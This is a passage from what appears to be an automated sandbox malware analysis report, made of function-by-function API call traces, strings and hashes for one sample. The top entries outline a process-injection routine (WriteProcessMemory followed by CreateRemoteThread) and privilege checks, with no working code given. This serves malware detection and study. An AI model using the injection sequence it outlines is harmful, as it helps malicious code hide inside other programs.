                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3542510048-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              Function 00401CF0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              Function 004034C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                              Function 0043A650 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: VUUU
                                                                                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                                                                                              • Opcode ID: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                              • Instruction ID: 83c8b6d4ae9392d60502dd360fb7ca1817b1c3f4776dddc770d92cd40da689bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FC1F571A4065647C728CF69C5902BAFBF1BF98310F08A12FD4D2D6B81E338E555CB55
                                                                                                                                                                                                              Function 00423970 Relevance: .8, Instructions: 833COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                              • Instruction ID: 49f4f21d9b48f79dac2c560b4f9f45e3af11d3fe5a8b8c575f21095663944224
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 466217302083668FE711CF349998AAB7BE4EF9B342F448559E881C7372DB35C949C799
                                                                                                                                                                                                              Function 004356D0 Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                              • Instruction ID: c7ae1df08a76fa61e3c99c46e8343ff6a04015de72be0cc750c2f716a6a279e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F442D171900A499FDB14DFA8C880AEFBBF5EF4C308F14555EE446A7341D738A946CBA8
                                                                                                                                                                                                              Function 004460F0 Relevance: .5, Instructions: 504COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                              • Instruction ID: 296f88951ecf7cea7bff09f9537e53bf2d2ecc764958e0785ba560d75f276c2e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6112E5306017849FEB25CF18C5906AEBBF1BF46310F16855AE8E54B792C338ED46CB56
                                                                                                                                                                                                              Function 00445A20 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                              • Instruction ID: 373094f0e44d4ed5b4a76297d3e75846c5555569b6fb32489a2bef93388bd825
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C812D230A00B859FEF21CF18C590AAEB7F1FF95310F14855AE8A64B792C338AD46CB55
                                                                                                                                                                                                              Function 004467C0 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                              • Instruction ID: cfa054cb93e044cdae65f2de48f0eb828664dc1768648188419bb013471483e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA12D530A057849FEB25CF18C490AAABBF1EF53314F15855EE8E54B391C338AD46CB66
                                                                                                                                                                                                              Function 00444790 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                              • Instruction ID: c484f8b887487c68eb1831faa77cd2835b2ef54b83a3a9b38c3ea20a6c7484b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA12D430A017859FEB21CF18C58079ABBF1FF96310F19855AE8A59B381D338ED46CB65
                                                                                                                                                                                                              Function 00442340 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction ID: 9417f9ed4064ddd1c3f6edb80d8f66b01d291d1ab21ea86703028fde516e46eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E02F530A007459FEB20CF28C6906AFB7F1FF41310F55855AF8A54B391D778A986CBA5
                                                                                                                                                                                                              Function 00442FA0 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                              Function 00443C00 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                              Function 004416D0 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                              Function 00408FA0 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 237a5ef1c881c77b559dd56a398dfbcec35f8c464cc1561565d778ccfd860f47
                                                                                                                                                                                                              • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 237a5ef1c881c77b559dd56a398dfbcec35f8c464cc1561565d778ccfd860f47
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                              Function 0043AC30 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                              Function 00440880 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                              Function 0044A8A0 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
                                                                                                                                                                                                              Function 0043C0D0 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
                                                                                                                                                                                                              Function 00406B60 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
